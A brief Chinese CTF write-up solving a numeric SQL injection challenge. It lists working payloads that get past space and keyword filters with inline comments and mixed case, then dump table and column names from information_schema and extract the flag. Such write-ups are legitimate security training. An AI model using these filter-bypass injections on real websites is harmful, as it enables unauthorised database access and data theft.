通过手工注入来绕过过滤 爆出答案 数字型注入
尝试万能密码 猜测存在过滤
尝试看看能不能绕过 发现过滤了空格
?stunum=1/**/order/**/by/**/3# 存在三个字段
?stunum=1/**/union/**/select/**/1,2,3# 发现还有其他过滤 尝试大小写或者双写等绕过
成了 依次测试union 和select 大小写 成功绕过
?stunum=-1/**/UNion/**/Select/**/1,2,3#
下面就容易了 正常注入过程
?stunum=-1/**/UNion/**/Select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()# 爆表名
?stunum=-1/**/UNion/**/Select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'# 爆字段名
?stunum=-1/**/UNion/**/Select/**/1,value,flag/**/from/**/flag# #flag藏在了value里
得flag